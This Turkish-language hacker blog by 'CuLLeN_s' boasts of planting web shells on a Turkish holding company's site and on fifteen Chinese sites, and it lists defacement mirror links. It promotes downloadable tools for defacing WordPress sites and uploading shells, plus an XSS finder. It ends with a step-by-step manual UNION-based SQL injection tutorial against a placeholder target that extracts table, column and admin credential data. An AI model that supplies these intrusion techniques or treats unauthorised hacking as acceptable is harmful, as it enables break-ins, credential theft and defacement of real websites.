Turk Holding Hacked CuLLeN_s

Arkadaşlar merhaba..

Birkaç gün önce geçmişlerde burs başvurusu yaptığım bir holdingin sitesine girdim sonuçlara bakmak aklıma geldi. Tahmin edersiniz ki çıkmadı. Bende şu sıralar tekrar hacka heveslendiğim için websiteye girmişken bi bakayım neler yapabilirm diye kontrol ettim . Web güvenlik açığı tarayan programlarım taramadı..Yabancı sitelerden yeni öğrendiğim yöntemlerden birini denedim manuel bi kaç deneme yaptım şuan shell yüklü olarak duruyor. Kendilerini nasıl uyaracağımı düşünüyorum amacım tabi ki hack değil. Şuanlık websiteyi paylaşamam ama bu işten kurtulunca sizi de haberdar edeceğim.

Video da çektim. Bunu buraya atıyorum ileride bir belaya bulaşırsam kanıtım olsun amacım sadece bu açığın kapanmasını sağlamak . Türk sitelerine zarar vermek aklımın ucundan geçmez.






spacer

15 Çin Sitesi Hacked- Servere Sızdım

Evet Arkadaşlar uzun bir ara sonra sahalardayım. Şuan Hiçbir forum için hack yapmıyorum. Panele sızıp Shell upload ettim resim yükleme yerinden. sadece jpg kabul ediyordu bypass ederek shell upload ettim. Ve Sonrasında çıkan diğer siteleri hackledim. Hiçbirinin indexini bozmadım şuan php çalıştığım için biraz olsun saygı gösteriyorum hacked diye bir dosya yükleyerek adımı yazdım bu kadar. Bazılarının zoneleri almadım bugün baktığımda silinmişti dosyalar shellim duruyor tekrar uğraşmadım allyjısh alınmamış sonradan fark ettim o kadar önemli değil. Special Hacklarda buluşmak üzere. Esen kalın.


  • https://defacer.id/archive/mirror/7435134
  • https://defacer.id/archive/mirror/7435133
  • https://defacer.id/archive/mirror/7435132
  • https://defacer.id/archive/mirror/7435131
  • https://defacer.id/archive/mirror/7435130
  • https://defacer.id/archive/mirror/7435122
  • https://defacer.id/archive/mirror/7435134
  • http://aljyyosh.org/mirror.php?id=225152
  • http://aljyyosh.org/mirror.php?id=225151
  • http://aljyyosh.org/mirror.php?id=225150
  • http://aljyyosh.org/mirror.php?id=225149
  • http://aljyyosh.org/mirror.php?id=225148

spacer

CuLLeN_s Wp Hacker V4 Final ÇIKTI.!!! Tek tik ile site hackleme

Evet arkadaşlar baya istek olmuştu uzun bir aradan sonra projemi sonlandırıyorum çeşitli sürprizlerle..

Artık tek bir butona tıklayarak bir siteyi hackleyebilir.Hatta ve hatta zone kaydı alabilirsiniz.

Türk sitelerine karşı kullanmamanız dileğiyle..

programdan bir kaç görüntü.




Ve kullanım videosu

izle

Virüs total sonuçları





Virüs total

İndirme linki



İNDİR

spacer

CuLLeN_s Xss Bulucu

evet arkadaşlar bugün yep yeni bir projeyle karşınızdayım.. 

 bu program sayesinde 15-20 sn aralığında bir sitenin xss açığını bulabileceksiniz. 

kullanımı ve arayüzü gayet basit.

 tanıtım videosu 



 Virüs total Virüs Total sonuçları 

 + Programın ismi : CuLLeN_s XSS Bulucu 
 + Programın sürümü : 1.0 
 + Programın ve kaynak kodunun adresi: Tamamen Bana Ait 

spacer

CuLLeN_s Wp Hacker V3.2


NEDİR Şifresi bilinen siteye kolayca index atmaya ve shell atmaya yarar kesin hack imkanı verir 
ek olarak zone alır.


Bazı siteler için bypass özelliği vardır shell yüklerken.


Tanıtım/Kullanım/Tutorial


https://www.youtube.com/watch?v=y0NLZKwl7yk




Arkadaşlar uzun süredir beklediğiniz programı bugün buradan paylaşıyorum.
eski sürümdeki bazı hataları giderdim,config özelliği hata veriyor inş. ileride düzelteceğim bununla beraber 2 siteden zone alıyor.

bir teşekkürünüze passwordu veriyorum şifreyi iletişim adresinden isteyin.

lyokocode44@gmail.com


link : İNDİR

virüs-total  :   https://www.virustotal.com/tr/file/45406a56b42d707677adb563009cf7f8c88408aac07c83fdc319722c8f4f286b/analysis/


spacer

CuLLen_s Wp Hacker V3


Dikkat... Arkadaşlar ben bu programıma kullanım süresi koymuştum ileride pişman olursam program kendini kapatsın diye süresi doldu yeni sürüm v4 geliyor yakında...















CuLLeN_s Wp Hacker V3

Arkadaşlar programım binlerce insan tarafından kullanılmaya başlanınca bende blogumda paylaşma gereği duydum. Bu programı tht yıllarımda kodlamıştım , Rar pass için iletişim kısımından yazın hiçbir forumda artık aktif değilim bilginize.

CuLLeN_s Wp Hacker V3 indir

Not: bu program hacka yeni başlayanlar için kodlanmıştır WordPress sitelere index atmaya shell basmaya ve zone almaya yarar.  Web güvenlik zafiyeti kullanıp şifre kırmaz.

Rar pw için iletişim bölümünü kullanın arkadaşlar.


Yeni SÜRÜM Çıktı :  :  : Tıkla



spacer

5-)Manuel Sql İnjection

Manuel Sql İnjection,sql injection,gelişmiş sql injection,manuel sql enjeksiyon,elle sql hack,hack,sql.



Arkadaşlar bu konuyu çok özenle hazırladım her kodu sizin için açıkladım bu yüzden full yazı yazdım işin mantığı için okuyun. Ve takıldığınız yeri yorumda sorun lütfen.

Arkadaşlar sql injection hack yapacaksanız eğer size sadece manuel sql öneririm çünkü programı yazan kişide bir insandır ve o programlarda bizim burada çalıştıracağımız kodları çalıştırıyor.

Ama o programları yazan kişiler sql hakkında baya bilgili kişiler olduğu için manuel sql size onların programından daha etkisiz gelebilir.Ama öyle değildir ileri düzey düşüneceğiz ve "ileri düzey sql injection" ile o programların çekemediği bilgileri çekeceğiz.

öncelikle sitemizde sql injection açığının olduğundan emin olmalıyız.
bkz. Elle(manuel) Sql Açığı Tespit Etme

site: hedefsite.com/index.php?id=1 


order by 1 diyoruz ve "1" i sırayla arttırıyoruz mesela diyelim order by 8 yaptık site normal açıldı ama order by 9 yapınca bozulduysa bu sitede 8 tane kolon vardır.


hedefsite.com/index.php?id=1 order by 1



ardından union select 1,2,3,4,5,6,7,8 --> 8 kolon olduğu için 8'e kadar.
böyle yapınca ekrana bakıyoruz herhangi bir sayı arıyoruz bu sitede 2 sayısı yansıdı o zaman sql komutlarını 2 sayısını silip orada çalıştırabiliriz.


hedefsite.com/index.php?id=1union select 1,2,3,4,5,6,7,8

union select 1,Database(),3,4,5,6,7,8 bu sitemizin database ismi :)

hedefsite.com/index.php?id=1 union select 1,Database(),3,4,5,6,7,8

union select 1,version(),3,4,5,6,7,8 buda sitenin versiyonu eğer 5 ve üstü ise bu kodları çalıştıracağız ama eğer 4 ise hiç ugrasmayın :)




union select 1,Group_concat(table_name),3,4,5,6,7,8 from information_schema.tables --> "information_schema" her sitede bulunur bizim db ye ulaşmamızı sağlar. bu kod ile tabloları istedik


hedefsite.com/index.php?id=1 union select 1,Group_concat(table_name),3,4,5,6,7,8 from information_schema.tables



union select 1,Group_concat(column_name),3,4,5,6,7,8 from information_schema.columns bu kod ile kolonları istedik


hedefsite.com/index.php?id=1 union select 1,Group_concat(column_name),3,4,5,6,7,8 from information_schema.columns
union select 1,kolon adı,3,4,5,6,7,8 from tablo adı admin bilgilerinin olduğu tablodan kolonları yansıtmasını istedik :) ve admin username ve password :)






























spacer